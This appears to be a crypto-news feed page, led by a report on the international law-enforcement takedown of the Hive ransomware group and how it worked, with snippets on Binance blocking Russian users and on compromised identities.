However, since the end of 2022, a number of Russian users of Binance have complained about having their accounts blocked without explanation, as reported by Forklog. Many experienced problems for weeks, including suspended withdrawals amid prolonged checks, affected customers said. The company told the crypto news outlet that the blocking of users from Eastern Europe and the Commonwealth of Independent States was related to the case with the seized crypto exchange Bitzlato.

Do you think the restrictions will push more Russians towards buying ready-made accounts for cryptocurrency exchanges? Share your thoughts on the subject in the comments section below.

Law enforcement authorities from over a dozen countries in Europe and North America have taken part in disrupting the activities of the Hive ransomware group, the U.S. Justice Department and Europol announced. Hive is believed to have targeted various organizations worldwide in the past couple of years, often extorting payments in cryptocurrency.

Captured Decryption Keys Helped Hive Victims Avoid Paying $130 Million in Ransom

Ransomware network Hive, which has had around 1,500 victims in more than 80 countries, has been hit in a months-long disruption campaign, the U.S. Department of Justice (DOJ) and the European Union Agency for Law Enforcement Cooperation (Europol) revealed. A total of 13 nations participated in the operation, including EU member states, the U.K. and Canada.

Hive has been identified as a major cybersecurity threat as the ransomware has been used by affiliated actors to compromise and encrypt data and computer systems of government facilities, oil multinationals, IT and telecom companies in the EU and U.S., Europol said. Hospitals, schools, financial firms, and critical infrastructure have been targeted, the DOJ noted.

It has been one of the most prolific ransomware strains, Chainalysis pointed out, which has collected at least $100 million from victims since its launch in 2021. A recent report by the blockchain forensics company unveiled that revenue from such attacks has decreased last year, with a growing number of affected organizations refusing to pay the demanded ransoms.

According to the announcements by the law enforcement authorities, the U.S. Federal Bureau of Investigation (FBI) penetrated Hive’s computers in July 2022 and captured its decryption keys, providing them to victims around the world which prevented them from paying another $130 million.

Working with the German Federal Police and the Dutch High Tech Crime Unit, the Bureau has now seized control over the servers and websites that Hive used to communicate with its members and the victims, including the darknet domain where the stolen data was sometimes posted. FBI Director Christopher Wray was quoted as stating:

The coordinated disruption of Hive’s computer networks … shows what we can accomplish by combining a relentless search for useful technical information to share with victims.

The Hive ransomware was created, maintained and updated by developers while being employed by affiliates in a ‘ransomware-as-a-service’ (RaaS) double extortion model, Europol explained. The affiliates would initially copy the data and then encrypt the files before asking for a ransom to decrypt the information and not publish it on the leak site.

The attackers exploited various vulnerabilities and used a number of methods, including single factor logins via Remote Desktop Protocol (RDP), virtual private networks (VPNs), and other remote network connection protocols as well as phishing emails with malicious attachments, the law enforcement agencies detailed.

Do you expect police authorities around the world to dismantle more ransomware networks in the near future? Tell us in the comments section below.

“That was the only path through this darkness,” says U.S. prosecutor Zia Faruqui. “The darker the darknet gets, the way that you shine the light is following the money.” In “Tracers in the Dark,” Andy Greenberg, a senior writer at Wired, takes a historical look at what he calls Bitcoin’s “siren song: the promise of […]

Almost every day, someone calls me to inquire about how to deal with a compromised identity. It has become so common that I have come to the point of just assuming everyone has had their identity compromised in some way, shape or form after the last few years of large-scale data breaches[1]. In 2018, the […]

The post What Should You Do When Your Identity Has Been Compromised? appeared first on Radware Blog.